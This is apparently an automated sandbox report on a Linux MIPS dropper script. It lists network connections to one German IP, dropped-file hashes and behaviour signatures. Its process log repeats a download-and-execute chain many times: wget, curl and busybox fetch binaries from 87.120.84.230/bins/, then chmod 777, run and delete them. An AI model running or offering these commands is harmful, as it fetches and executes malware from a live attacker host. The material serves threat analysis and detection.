/usr/bin/wget
[wget http://87.120.84.230/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/chmod
[chmod 777 LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo
[./LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/rm
[rm LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/usr/bin/wget
[wget http://87.120.84.230/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/chmod
[chmod 777 OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K
[./OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/rm
[rm OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/usr/bin/wget
[wget http://87.120.84.230/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/chmod
[chmod 777 qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f
[./qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/rm
[rm qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/usr/bin/wget
[wget http://87.120.84.230/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/chmod
[chmod 777 hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU
[./hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/rm
[rm hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/usr/bin/wget
[wget http://87.120.84.230/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/chmod
[chmod 777 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD
[./0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/rm
[rm 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/usr/bin/wget
[wget http://87.120.84.230/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
Network
| Country | Destination | Domain | Proto |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
Files
/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms
| MD5 | 546071c6a6aeff34580b4d1a9b35a7c3 |
| SHA1 | dc2de298837a86d3bc86e8a328411229d9eccdb6 |
| SHA256 | 2d1255033a3f5cde3fb430b15d84ad95c1d7d37b25132cd3dcca7c30963e9f12 |
| SHA512 | 207f333daf98fe653f4f661defd86651cbb50e3482511769d0558d2fd80ce107ec6a519424e05107740a802b444b62445901788d80dde4e8dbc8ee116d5b9be7 |
/tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
memory/750-1-0xb6778000-0xb6789044-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-29 01:46
Reported
2024-10-29 01:48
Platform
debian9-mipsbe-20240611-en
Max time kernel
150s
Max time network
155s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms | /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms | N/A |
| N/A | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | N/A |
| N/A | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | N/A |
| N/A | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | N/A |
| N/A | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | N/A |
| N/A | /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB | /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB | N/A |
| N/A | /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S | /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S | N/A |
| N/A | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | N/A |
| N/A | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | N/A |
| N/A | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | N/A |
| N/A | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | N/A |
| N/A | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | N/A |
| N/A | /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF | /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF | N/A |
| N/A | /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 | /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 | N/A |
| N/A | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | N/A |
| N/A | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | N/A |
| N/A | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | N/A |
| N/A | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | N/A |
| N/A | /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF | /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF | N/A |
| N/A | /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 | /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 | N/A |
| N/A | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | N/A |
| N/A | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | N/A |
| N/A | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | N/A |
| N/A | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | N/A |
| N/A | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | /usr/bin/curl | N/A |
| File opened for modification | /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | /usr/bin/curl | N/A |
| File opened for modification | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | /usr/bin/curl | N/A |
| File opened for modification | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | /usr/bin/curl | N/A |
Processes
/tmp/a5d00471e4903988f4d09563ee3cad4dba92df4fbd6cae9d1b2ffb9ac8538747.sh
[/tmp/a5d00471e4903988f4d09563ee3cad4dba92df4fbd6cae9d1b2ffb9ac8538747.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.84.230/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/chmod
[chmod 777 GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms
[./GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/rm
[rm GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/usr/bin/wget
[wget http://87.120.84.230/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/chmod
[chmod 777 zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt
[./zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/rm
[rm zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/usr/bin/wget
[wget http://87.120.84.230/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/chmod
[chmod 777 xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF
[./xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/rm
[rm xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/usr/bin/wget
[wget http://87.120.84.230/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/chmod
[chmod 777 CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs
[./CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/rm
[rm CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/usr/bin/wget
[wget http://87.120.84.230/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/chmod
[chmod 777 jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa
[./jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/rm
[rm jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/usr/bin/wget
[wget http://87.120.84.230/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/bin/chmod
[chmod 777 DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB
[./DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/bin/rm
[rm DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/usr/bin/wget
[wget http://87.120.84.230/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/bin/chmod
[chmod 777 ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S
[./ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/bin/rm
[rm ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/usr/bin/wget
[wget http://87.120.84.230/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/chmod
[chmod 777 LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo
[./LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/rm
[rm LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/usr/bin/wget
[wget http://87.120.84.230/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/chmod
[chmod 777 OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K
[./OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/rm
[rm OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/usr/bin/wget
[wget http://87.120.84.230/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/chmod
[chmod 777 qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f
[./qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/rm
[rm qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/usr/bin/wget
[wget http://87.120.84.230/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/chmod
[chmod 777 hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU
[./hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/rm
[rm hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/usr/bin/wget
[wget http://87.120.84.230/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/chmod
[chmod 777 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD
[./0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/rm
[rm 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/usr/bin/wget
[wget http://87.120.84.230/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/bin/chmod
[chmod 777 waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF
[./waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/bin/rm
[rm waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/usr/bin/wget
[wget http://87.120.84.230/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/bin/chmod
[chmod 777 quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0
[./quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/bin/rm
[rm quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/usr/bin/wget
[wget http://87.120.84.230/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/chmod
[chmod 777 OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K
[./OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/rm
[rm OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/usr/bin/wget
[wget http://87.120.84.230/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/usr/bin/curl
